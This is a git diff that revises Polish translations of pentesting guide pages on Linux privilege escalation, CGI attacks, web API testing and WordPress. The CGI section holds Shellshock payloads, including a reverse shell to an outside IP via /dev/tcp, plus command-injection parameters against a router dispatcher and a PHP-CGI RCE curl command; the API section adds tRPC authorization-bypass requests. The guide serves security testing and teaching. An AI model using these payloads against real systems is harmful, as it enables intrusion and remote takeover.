+Z kolei `/etc/init` jest powiązany z **Upstart**, nowszym systemem **zarządzania usługami** wprowadzonym przez Ubuntu, wykorzystującym pliki konfiguracyjne do zarządzania usługami. Pomimo przejścia na Upstart, skrypty SysVinit są nadal używane obok konfiguracji Upstart dzięki warstwie kompatybilności w Upstart.
 
-**systemd** pojawia się jako nowoczesny init i manager usług, oferując zaawansowane funkcje takie jak uruchamianie daemonów na żądanie, zarządzanie automount oraz snapshoty stanu systemu. Organizuje pliki w `/usr/lib/systemd/` dla pakietów dystrybucyjnych i `/etc/systemd/system/` dla modyfikacji administratora, upraszczając administrację systemem.
+**systemd** pojawia się jako nowoczesny init i menedżer usług, oferując zaawansowane funkcje, takie jak uruchamianie demonów na żądanie, zarządzanie automountami i migawki stanu systemu. Organizuje pliki w `/usr/lib/systemd/` dla pakietów dystrybucyjnych oraz w `/etc/systemd/system/` dla modyfikacji administratora, upraszczając administrację systemem.
 
-## Inne sztuczki
+## Inne techniki
 
 ### NFS Privilege escalation
 
@@ -1486,7 +1480,7 @@ cisco-vmanage.md
 
 ## Android rooting frameworks: manager-channel abuse
 
-Android rooting frameworks często hookują syscall, aby udostępnić uprzywilejowaną funkcjonalność kernela menedżerowi userspace. Słaba autentykacja menedżera (np. sprawdzanie sygnatury oparte na porządku FD lub słabe schematy haseł) może umożliwić lokalnej aplikacji podszycie się pod menedżera i eskalację do root na już zrootowanych urządzeniach. Więcej informacji i szczegóły eksploatacji tutaj:
+Frameworki do rootowania Androida często hookują syscall, aby udostępnić uprzywilejowaną funkcjonalność jądra menedżerowi w userspace. Słaba autoryzacja menedżera (np. sprawdzanie podpisu oparte na FD-order lub słabe schematy haseł) może umożliwić lokalnej aplikacji podszycie się pod menedżera i eskalację do root na urządzeniach już zrootowanych. Dowiedz się więcej i zobacz szczegóły eksploatacji tutaj:
 
 
 {{#ref}}
@@ -1495,26 +1489,26 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 
 ## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244)
 
-Regex-driven service discovery w VMware Tools/Aria Operations może wyciągnąć ścieżkę binarki z linii poleceń procesu i uruchomić ją z -v w uprzywilejowanym kontekście. Permisywne wzorce (np. używające \S) mogą dopasować listenery przygotowane przez atakującego w zapisywalnych lokalizacjach (np. /tmp/httpd), prowadząc do wykonania jako root (CWE-426 Untrusted Search Path).
+Regex-driven service discovery w VMware Tools/Aria Operations może wyciągnąć ścieżkę binarki z linii poleceń procesu i wykonać ją z -v w uprzywilejowanym kontekście. Permisywne wzorce (np. używające \S) mogą dopasować listenery podstawione przez atakującego w zapisywalnych lokalizacjach (np. /tmp/httpd), co prowadzi do wykonania jako root (CWE-426 Untrusted Search Path).
 
-Dowiedz się więcej i zobacz uogólniony wzorzec zastosowalny do innych stacków discovery/monitoring tutaj:
+Dowiedz się więcej i zobacz uogólniony wzorzec zastosowalny w innych stosach discovery/monitoringu tutaj:
 
 {{#ref}}
 vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 {{#endref}}
 
-## Kernel Security Protections
+## Mechanizmy zabezpieczeń jądra
 
 - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
 - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map)
 
-## More help
+## Więcej pomocy
 
 [Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)
 
 ## Linux/Unix Privesc Tools
 
-### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+### **Najlepsze narzędzie do wyszukiwania lokalnych wektorów Linux local privilege escalation:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
 
 **LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\
 **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md
index bf6925806..559749700 100644
--- a/src/network-services-pentesting/pentesting-web/cgi.md
+++ b/src/network-services-pentesting/pentesting-web/cgi.md
@@ -5,26 +5,26 @@
 
 ## Informacje
 
-The **CGI scripts are perl scripts**, więc jeśli przejąłeś serwer, który może wykonywać _**.cgi**_ skrypty, możesz **wgrać perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **zmienić rozszerzenie** z **.pl** na **.cgi**, nadać **uprawnienia do wykonania** \(`chmod +x`\) i **uzyskać dostęp** do reverse shella **z poziomu przeglądarki**, aby go uruchomić.
-Aby testować **CGI vulns** zaleca się użycie `nikto -C all` \(and all the plugins\)
+Skrypty **CGI są skryptami perl**, więc, jeśli przejąłeś serwer, który może wykonywać _**.cgi**_ pliki możesz **wgrać perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **zmienić rozszerzenie** z **.pl** na **.cgi**, nadać **uprawnienia do wykonania** \(`chmod +x`\) i **uzyskać dostęp** do reverse shella **z poziomu przeglądarki**, aby go uruchomić.
+Aby przetestować **CGI vulns** zaleca się użycie `nikto -C all` \(i wszystkich wtyczek\)
 
 ## **ShellShock**
 
-**ShellShock** to luka bezpieczeństwa, która dotyczy szeroko używanej powłoki **Bash** w systemach operacyjnych opartych na Unix. Wykorzystuje zdolność Bash do uruchamiania poleceń przekazywanych przez aplikacje. Luka polega na manipulacji **zmiennymi środowiskowymi**, które są dynamicznymi, nazwanymi wartościami wpływającymi na sposób uruchamiania procesów w systemie. Atakujący mogą to wykorzystać, dołączając **złośliwy kod** do zmiennych środowiskowych, który jest wykonywany po otrzymaniu zmiennej. To pozwala potencjalnie na przejęcie systemu.
+**ShellShock** to **luka**, która dotyczy szeroko używanej powłoki wiersza poleceń **Bash** w systemach operacyjnych opartych na Unix. Atakuje zdolność Bash do uruchamiania poleceń przekazywanych przez aplikacje. Luka polega na manipulacji **zmiennymi środowiskowymi**, które są dynamicznymi, nazwanymi wartościami wpływającymi na sposób działania procesów na komputerze. Atakujący mogą to wykorzystać, dołączając **złośliwy kod** do zmiennych środowiskowych, który jest wykonywany po otrzymaniu zmiennej. To pozwala atakującym potencjalnie przejąć system.
 
-Podczas eksploatacji tej luki strona może zwrócić błąd.
+Eksploatując tę lukę **strona może zwrócić błąd**.
 
-Możesz znaleźć tę lukę, zauważając, że używana jest stara wersja **Apache** i **cgi_mod** (z folderem cgi) lub używając **nikto**.
+Możesz **znaleźć** tę lukę, zauważając użycie **starej wersji Apache** i **cgi_mod** \(z folderem cgi\) lub używając **nikto**.
 
 ### **Test**
 
-Większość testów polega na użyciu polecenia echo i oczekiwaniu, że zwrócony ciąg pojawi się w odpowiedzi web. Jeśli uważasz, że strona może być podatna, wyszukaj wszystkie strony cgi i przetestuj je.
+Większość testów polega na użyciu polecenia echo i oczekiwaniu, że dany ciąg zostanie zwrócony w odpowiedzi webowej. Jeśli uważasz, że strona może być podatna, wyszukaj wszystkie strony cgi i przetestuj je.
 
 **Nmap**
 ```bash
 nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
 ```
-## **Curl \(odbity, ślepy i poza pasmem\)**
+## **Curl \(reflected, blind and out-of-band\)**
 ```bash
 # Reflected
 curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
@@ -51,17 +51,17 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > set rhosts 10.1.2.11
 > run
 ```
-## Scentralizowane dispatchery CGI (trasowanie do pojedynczego endpointu przez parametry selektora)
+## Scentralizowane CGI dispatchery (single endpoint routing via selector parameters)
 
-Wiele wbudowanych interfejsów webowych multipleksuje dziesiątki uprzywilejowanych akcji za pojedynczym endpointem CGI (na przykład, `/cgi-bin/cstecgi.cgi`) i używa parametru selektora takiego jak `topicurl=<handler>`, aby przekierować żądanie do wewnętrznej funkcji.
+Wiele wbudowanych interfejsów WWW grupuje dziesiątki uprzywilejowanych akcji za jednym CGI endpointem (np. `/cgi-bin/cstecgi.cgi`) i używa selector parameter takiego jak `topicurl=<handler>`, aby skierować żądanie do wewnętrznej funkcji.
 
 Metodologia wykorzystania tych dispatcherów:
 
-- Wylicz nazwy handlerów: przeszukaj JS/HTML, wykonaj brute-force przy użyciu wordlists, albo rozpakuj firmware i grepuj w poszukiwaniu ciągów handlerów używanych przez dispatcher.
-- Sprawdź dostępność bez uwierzytelnienia: niektóre handlery pomijają kontrole auth i są wywoływalne bezpośrednio.
-- Skoncentruj się na handlerach, które wywołują narzędzia systemowe lub operują na plikach; słabe walidatory często blokują tylko kilka znaków i mogą pominąć wiodący minus `-`.
+- Wymień nazwy handlerów: scrape JS/HTML, brute-force za pomocą wordlists, lub rozpakuj firmware i użyj grep, by znaleźć handler strings używane przez dispatcher.
+- Sprawdź unauthenticated reachability: niektóre handlery pomijają auth checks i są bezpośrednio callable.
+- Skoncentruj się na handlerach, które wywołują system utilities lub operują na plikach; słabe validators często blokują tylko kilka znaków i mogą przeoczyć wiodący myślnik `-`.
 
-Ogólne wzorce exploitów:
+Ogólne schematy exploitów:
 ```http
 POST /cgi-bin/cstecgi.cgi HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
@@ -75,32 +75,31 @@ topicurl=setEasyMeshAgentCfg&agentName=;id;
 # 3) Validator bypass → arbitrary file write in file-touching handlers
 topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
 ```
-Wykrywanie i zabezpieczanie:
+Wykrywanie i wzmacnianie zabezpieczeń:
 
-- Monitoruj nieautentyfikowane żądania do scentralizowanych CGI endpoints z `topicurl` ustawionym na wrażliwe handlers.
-- Oznacz parametry zaczynające się od `-` (argv option injection attempts).
-- Dostawcy: wymuszaj uwierzytelnianie na wszystkich state-changing handlers, waliduj używając ścisłych allowlists/types/lengths i nigdy nie przekazuj user-controlled strings jako command-line flags.
+- Uważaj na nieautoryzowane żądania do scentralizowanych endpointów CGI z `topicurl` ustawionym na wrażliwe handlery.
+- Oznaczaj parametry zaczynające się od `-` (argv option injection attempts).
+- Dostawcy: wymuszaj uwierzytelnianie dla wszystkich state-changing handlers, waliduj używając rygorystycznych allowlists/types/lengths i nigdy nie przekazuj kontrolowanych przez użytkownika ciągów jako command-line flags.
 
 ## Stare PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
-W skrócie, jeśli cgi jest aktywne i php jest "stare" \(&lt;5.3.12 / &lt; 5.4.2\) możesz wykonać kod.
-Aby wykorzystać tę podatność musisz uzyskać dostęp do jakiegoś pliku PHP serwera WWW bez wysyłania parametrów \(szczególnie bez wysyłania znaku "="\).
-Aby przetestować tę podatność możesz np. uzyskać dostęp do `/index.php?-s` \(zwróć uwagę na `-s`\) i **kod źródłowy aplikacji pojawi się w odpowiedzi**.
+W zasadzie jeśli cgi jest aktywne i php jest "stare" \(&lt;5.3.12 / &lt; 5.4.2\) możesz wykonać kod.
+Aby wyeksploitować tę podatność, musisz uzyskać dostęp do jakiegoś pliku PHP na serwerze WWW bez wysyłania parametrów \(szczególnie bez wysyłania znaku "="\).
+Aby przetestować tę podatność, możesz np. uzyskać dostęp do `/index.php?-s` \(zwróć uwagę na `-s`\) i **kod źródłowy aplikacji pojawi się w odpowiedzi**.
 
-Następnie, aby uzyskać **RCE** możesz wysłać to specjalne zapytanie: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` a **PHP code** do wykonania umieścić w **body of the request**.
-Przykład:
+Aby uzyskać **RCE**, możesz wysłać to specjalne zapytanie: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` i umieścić **PHP code** do wykonania w **treści żądania**. Przykład:
 ```bash
 curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
 ```
 **Więcej informacji o vuln i możliwych exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
-## **Proxy \(MitM — dla żądań serwera WWW\)**
+## **Proxy \(MitM do żądań serwera WWW\)**
 
-CGI tworzy zmienną środowiskową dla każdego nagłówka w żądaniu HTTP. Na przykład: "host:web.com" zostaje utworzony jako "HTTP_HOST"="web.com"
+CGI tworzy zmienną środowiskową dla każdego nagłówka w żądaniu HTTP. Na przykład: "host:web.com" jest tworzony jako "HTTP_HOST"="web.com"
 
-Ponieważ zmienna HTTP_PROXY może być używana przez serwer WWW, spróbuj wysłać **nagłówek** zawierający: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**". Jeśli serwer wykona jakiekolwiek żądanie podczas sesji, będziesz w stanie przechwycić każde żądanie wysyłane przez serwer.
+Ponieważ zmienna HTTP_PROXY może być używana przez serwer WWW. Spróbuj wysłać **header** zawierający: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" i jeśli serwer wykona jakiekolwiek żądanie podczas sesji, będziesz w stanie przechwycić każde żądanie wykonane przez serwer.
 
-## **Referencje**
+## **References**
 
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 3a4bc55de..15135d450 100644
--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -2,54 +2,96 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Podsumowanie Metodologii Pentestingu API
+## Podsumowanie metodyki pentestingu API
 
-Pentesting API wymaga strukturalnego podejścia do odkrywania luk. Ten przewodnik zawiera kompleksową metodologię, podkreślając praktyczne techniki i narzędzia.
+Pentesting API wymaga uporządkowanego podejścia do odkrywania podatności. Ten przewodnik zawiera kompleksową metodykę, kładąc nacisk na praktyczne techniki i narzędzia.
 
-### **Zrozumienie Typów API**
+### **Zrozumienie typów API**
 
-- **SOAP/XML Web Services**: Wykorzystują format WSDL do dokumentacji, zazwyczaj dostępny pod ścieżkami `?wsdl`. Narzędzia takie jak **SOAPUI** i **WSDLer** (rozszerzenie Burp Suite) są niezbędne do analizowania i generowania żądań. Przykładowa dokumentacja jest dostępna pod adresem [DNE Online](http://www.dneonline.com/calculator.asmx).
-- **REST APIs (JSON)**: Dokumentacja często występuje w plikach WADL, jednak narzędzia takie jak [Swagger UI](https://swagger.io/tools/swagger-ui/) oferują bardziej przyjazny interfejs do interakcji. **Postman** to cenne narzędzie do tworzenia i zarządzania przykładowymi żądaniami.
-- **GraphQL**: Język zapytań dla API oferujący pełny i zrozumiały opis danych w Twoim API.
+- **SOAP/XML Web Services**: Wykorzystują format WSDL do dokumentacji, zazwyczaj dostępny pod ścieżkami `?wsdl`. Narzędzia takie jak **SOAPUI** i **WSDLer** (Burp Suite Extension) są przydatne do parsowania i generowania żądań. Przykładowa dokumentacja jest dostępna na [DNE Online](http://www.dneonline.com/calculator.asmx).
+- **REST APIs (JSON)**: Dokumentacja często występuje w plikach WADL, a narzędzia takie jak [Swagger UI](https://swagger.io/tools/swagger-ui/) oferują wygodniejszy interfejs do interakcji. **Postman** jest przydatnym narzędziem do tworzenia i zarządzania przykładowymi żądaniami.
+- **GraphQL**: Język zapytań dla API, który oferuje pełny i zrozumiały opis danych w API.
 
-### **Laboratoria Praktyczne**
+### **Laboratoria praktyczne**
 
-- [**VAmPI**](https://github.com/erev0s/VAmPI): Celowo podatne API do praktyki, obejmujące 10 najważniejszych luk w API według OWASP.
+- [**VAmPI**](https://github.com/erev0s/VAmPI): Celowo podatne API do praktycznych ćwiczeń, obejmujące OWASP top 10 podatności API.
 
-### **Skuteczne Sztuczki do Pentestingu API**
+### **Skuteczne techniki dla pentestingu API**
 
-- **Vulnerabilities SOAP/XML**: Zbadaj luki XXE, chociaż deklaracje DTD są często ograniczone. Tag CDATA może umożliwić wstawienie ładunku, jeśli XML pozostaje ważny.
-- **Escalacja Uprawnień**: Testuj punkty końcowe z różnymi poziomami uprawnień, aby zidentyfikować możliwości nieautoryzowanego dostępu.
-- **Błędy w Konfiguracji CORS**: Zbadaj ustawienia CORS pod kątem potencjalnej możliwości wykorzystania przez ataki CSRF z sesji uwierzytelnionych.
-- **Odkrywanie Punktów Końcowych**: Wykorzystaj wzorce API do odkrywania ukrytych punktów końcowych. Narzędzia takie jak fuzzery mogą zautomatyzować ten proces.
-- **Manipulacja Parametrami**: Eksperymentuj z dodawaniem lub zastępowaniem parametrów w żądaniach, aby uzyskać dostęp do nieautoryzowanych danych lub funkcji.
-- **Testowanie Metod HTTP**: Zmieniaj metody żądań (GET, POST, PUT, DELETE, PATCH), aby odkryć nieoczekiwane zachowania lub ujawnienia informacji.
-- **Manipulacja Typem Zawartości**: Przełączaj się między różnymi typami zawartości (x-www-form-urlencoded, application/xml, application/json), aby testować problemy z analizą lub luki.
-- **Zaawansowane Techniki Parametrów**: Testuj z nieoczekiwanymi typami danych w ładunkach JSON lub baw się danymi XML w celu wstrzyknięć XXE. Spróbuj również zanieczyszczenia parametrów i znaków wieloznacznych dla szerszego testowania.
-- **Testowanie Wersji**: Starsze wersje API mogą być bardziej podatne na ataki. Zawsze sprawdzaj i testuj przeciwko wielu wersjom API.
+- **SOAP/XML Vulnerabilities**: Poszukaj podatności XXE, chociaż deklaracje DTD są często ograniczone. Tagi CDATA mogą umożliwić wstawienie ładunku, jeśli XML pozostaje ważny.
+- **Privilege Escalation**: Testuj endpointy z różnymi poziomami uprawnień, aby zidentyfikować możliwości nieautoryzowanego dostępu.
+- **CORS Misconfigurations**: Sprawdź ustawienia CORS pod kątem potencjalnego wykorzystania przez ataki CSRF z uwierzytelnionych sesji.
+- **Endpoint Discovery**: Wykorzystaj wzorce API do odkrywania ukrytych endpointów. Narzędzia takie jak fuzzers mogą zautomatyzować ten proces.
+- **Parameter Tampering**: Eksperymentuj z dodawaniem lub zamianą parametrów w żądaniach, aby uzyskać dostęp do nieautoryzowanych danych lub funkcji.
+- **HTTP Method Testing**: Zmieniaj metody żądań (GET, POST, PUT, DELETE, PATCH), aby odkryć nieoczekiwane zachowania lub ujawnienia informacji.
+- **Content-Type Manipulation**: Przełączaj się między różnymi typami treści (x-www-form-urlencoded, application/xml, application/json), aby testować problemy z parsowaniem lub podatności.
+- **Advanced Parameter Techniques**: Testuj niespodziewane typy danych w payloadach JSON lub manipuluj danymi XML w celu XXE. Również spróbuj parameter pollution i znaków wieloznacznych dla szerszych testów.
+- **Version Testing**: Starsze wersje API mogą być bardziej podatne na ataki. Zawsze sprawdzaj i testuj przeciwko wielu wersjom API.
 
-### **Narzędzia i Zasoby do Pentestingu API**
+### Autoryzacja i logika biznesowa (AuthN != AuthZ) — pułapki tRPC/Zod protectedProcedure
 
-- [**kiterunner**](https://github.com/assetnote/kiterunner): Doskonałe do odkrywania punktów końcowych API. Użyj go do skanowania i brutalnego wymuszania ścieżek i parametrów przeciwko docelowym API.
+Nowoczesne stosy TypeScript często używają tRPC z Zod do walidacji wejścia. W tRPC `protectedProcedure` zazwyczaj zapewnia, że żądanie ma ważną sesję (uwierzytelnienie), ale nie oznacza, że wywołujący ma odpowiednią rolę/uprawnienia (autoryzacja). Ta niezgodność prowadzi do Broken Function Level Authorization/BOLA, jeśli wrażliwe procedury są zabezpieczone tylko przez `protectedProcedure`.
+
+- Model zagrożenia: Każdy uwierzytelniony użytkownik o niskich uprawnieniach może wywołać procedury przeznaczone dla administratora, jeśli brakuje sprawdzeń ról (np. migracje w tle, feature flags, tenant-wide maintenance, job control).
+- Sygnalizacja w black-box: endpointy `POST /api/trpc/<router>.<procedure>` które zwracają sukces dla podstawowych kont, gdy powinny być dostępne tylko dla administratorów. Samoobsługowe rejestracje (self-serve signups) drastycznie zwiększają możliwość ich wykorzystania.
+- Typowy kształt trasy tRPC (v10+): ciało JSON opakowane w `{"input": {...}}`.
+
+Przykładowy podatny wzorzec (brak bramki ról/uprawnień):
+```ts
+// The endpoint for retrying a migration job
+// This checks for a valid session (authentication)
+retry: protectedProcedure
+// but not for an admin role (authorization).
+.input(z.object({ name: z.string() }))
+.mutation(async ({ input, ctx }) => {
+// Logic to restart a sensitive migration
+}),
+```
+Praktyczna eksploatacja (black-box)
+
+1) Zarejestruj zwykłe konto i uzyskaj uwierzytelnioną sesję (cookies/headers).
+2) Enumeruj background jobs lub inne wrażliwe zasoby za pomocą procedur “list”/“all”/“status”.
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
+-H 'Content-Type: application/json' \
+-b '<AUTH_COOKIES>' \
+--data '{"input":{}}'
+```
+3) Wywołaj uprzywilejowane akcje, takie jak ponowne uruchomienie joba:
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
+-H 'Content-Type: application/json' \
+-b '<AUTH_COOKIES>' \
+--data '{"input":{"name":"<migration_name>"}}'
+```
+Impact to assess
+
+- Uszkodzenie danych wskutek nie-idempotentnych restartów: Wymuszanie równoległych uruchomień migrations/workers może tworzyć race conditions i powodować niespójne, częściowe stany (ciche utraty danych, uszkodzona analityka).
+- DoS przez wyczerpanie worker/DB: Powtarzane wywoływanie ciężkich zadań może wyczerpać pule workerów i połączenia do bazy danych, powodując przestoje obejmujące wszystkich tenantów.
+
+### **Narzędzia i zasoby dla API Pentesting**
+
+- [**kiterunner**](https://github.com/assetnote/kiterunner): Doskonały do odkrywania endpointów API. Użyj go do skanowania i przeprowadzania brute force na ścieżkach i parametrach wobec docelowych API.
 ```bash
 kr scan https://domain.com/api/ -w routes-large.kite -x 20
 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ```
-- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj to narzędzie wiersza poleceń zaprojektowane do wspomagania audytu **ujawnionych plików definicji Swagger/OpenAPI** poprzez sprawdzanie powiązanych punktów końcowych API pod kątem słabej autoryzacji. Oferuje również szablony poleceń do ręcznego testowania podatności.
-- Dodatkowe narzędzia, takie jak **automatic-api-attack-tool**, **Astra** i **restler-fuzzer**, oferują dostosowane funkcjonalności do testowania bezpieczeństwa API, od symulacji ataków po fuzzing i skanowanie podatności.
-- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): To narzędzie do zabezpieczania API, które audytuje Twoje API na podstawie pliku OAS (narzędzie napisane w rust).
+- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj to narzędzie wiersza poleceń zaprojektowane, aby pomagać w audycie **exposed Swagger/OpenAPI definition files** poprzez sprawdzanie powiązanych API endpoints pod kątem słabego uwierzytelniania. Dostarcza także szablony poleceń do ręcznego testowania podatności.
+- Dodatkowe narzędzia takie jak **automatic-api-attack-tool**, **Astra**, i **restler-fuzzer** oferują wyspecjalizowane funkcje do testów bezpieczeństwa API, od symulacji ataków po fuzzing i skanowanie podatności.
+- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): To narzędzie do bezpieczeństwa API, które audytuje Twoje API na podstawie pliku OAS (narzędzie napisane w rust).
 
-### **Zasoby do nauki i praktyki**
+### **Zasoby do nauki i ćwiczeń**
 
-- **OWASP API Security Top 10**: Kluczowa lektura dla zrozumienia powszechnych podatności API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
+- **OWASP API Security Top 10**: Podstawowa lektura do zrozumienia typowych podatności w API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
 - **API Security Checklist**: Kompletna lista kontrolna zabezpieczania API ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
-- **Logger++ Filters**: Do poszukiwania podatności API, Logger++ oferuje przydatne filtry ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
-- **API Endpoints List**: Starannie wyselekcjonowana lista potencjalnych punktów końcowych API do celów testowych ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
+- **Logger++ Filters**: Do wykrywania podatności w API, Logger++ oferuje przydatne filtry ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
+- **API Endpoints List**: Kuratorowana lista potencjalnych API endpoints do celów testowych ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
 
-## Referencje
+## References
 
 - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
+- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
index 6e8cfd9ed..4e2ca3c72 100644
--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -5,37 +5,37 @@
 ## Podstawowe informacje
 
 - **Przesłane** pliki trafiają do: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **Pliki motywów znajdują się w /wp-content/themes/,** więc jeśli zmienisz jakiś php motywu, aby uzyskać RCE, prawdopodobnie użyjesz tej ścieżki. Na przykład: Używając **theme twentytwelve** możesz **dostępować** do pliku **404.php** w: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Pliki motywów można znaleźć w /wp-content/themes/,** więc jeśli zmienisz jakiś php motywu, aby uzyskać RCE, prawdopodobnie będziesz korzystać z tej ścieżki. Na przykład: używając **theme twentytwelve** możesz **dostęp** do pliku **404.php** pod adresem: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- **Inny przydatny adres może być:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Inny przydatny adres URL może być:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- W **wp-config.php** możesz znaleźć hasło root do bazy danych.
+- W **wp-config.php** możesz znaleźć hasło roota do bazy danych.
 - Domyślne ścieżki logowania do sprawdzenia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
 
-### **Main WordPress Files**
+### **Główne pliki WordPress**
 
 - `index.php`
 - `license.txt` zawiera przydatne informacje, takie jak zainstalowana wersja WordPress.
-- `wp-activate.php` jest używany podczas procesu aktywacji przez email przy zakładaniu nowej strony WordPress.
+- `wp-activate.php` jest używany do procesu aktywacji przez e-mail przy zakładaniu nowej witryny WordPress.
 - Foldery logowania (mogą być przemianowane, aby je ukryć):
 - `/wp-admin/login.php`
 - `/wp-admin/wp-login.php`
 - `/login.php`
 - `/wp-login.php`
-- `xmlrpc.php` to plik będący funkcją WordPress, która umożliwia przesyłanie danych z HTTP jako mechanizmem transportu i XML jako mechanizmem kodowania. Ten typ komunikacji został zastąpiony przez WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
-- Folder `wp-content` jest głównym katalogiem, w którym przechowywane są pluginy i motywy.
+- `xmlrpc.php` to plik reprezentujący funkcję WordPress umożliwiającą przesyłanie danych z użyciem HTTP jako mechanizmu transportu i XML jako mechanizmu kodowania. Ten typ komunikacji został zastąpiony przez WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
+- Folder `wp-content` to główny katalog, w którym przechowywane są pluginy i motywy.
 - `wp-content/uploads/` to katalog, w którym przechowywane są wszystkie pliki przesłane na platformę.
-- `wp-includes/` to katalog, w którym przechowywane są pliki core, takie jak certyfikaty, czcionki, pliki JavaScript i widgety.
-- `wp-sitemap.xml` W wersjach Wordpress 5.5 i nowszych, Wordpress generuje plik sitemap XML ze wszystkimi publicznymi wpisami oraz publicznie zapytalnymi typami wpisów i taksonomiami.
+- `wp-includes/` to katalog, gdzie przechowywane są pliki rdzenia, takie jak certyfikaty, czcionki, pliki JavaScript i widgety.
+- `wp-sitemap.xml` W wersjach WordPress 5.5 i nowszych, WordPress generuje plik sitemap XML ze wszystkimi publicznymi wpisami oraz publicznie queryable typami postów i taksonomiami.
 
 **Post exploitation**
 
-- Plik `wp-config.php` zawiera informacje wymagane przez WordPress do połączenia z bazą danych, takie jak nazwa bazy danych, host bazy danych, nazwa użytkownika i hasło, klucze uwierzytelniania i salts oraz prefiks tabel bazy danych. Ten plik konfiguracyjny może być również użyty do aktywacji trybu DEBUG, co może być przydatne w rozwiązywaniu problemów.
+- Plik `wp-config.php` zawiera informacje wymagane przez WordPress do połączenia z bazą danych, takie jak nazwa bazy danych, host bazy danych, nazwa użytkownika i hasło, klucze uwierzytelniania i salts oraz prefiks tabel bazy danych. Ten plik konfiguracyjny może być również użyty do włączenia trybu DEBUG, co może być przydatne przy rozwiązywaniu problemów.
 
 ### Uprawnienia użytkowników
 
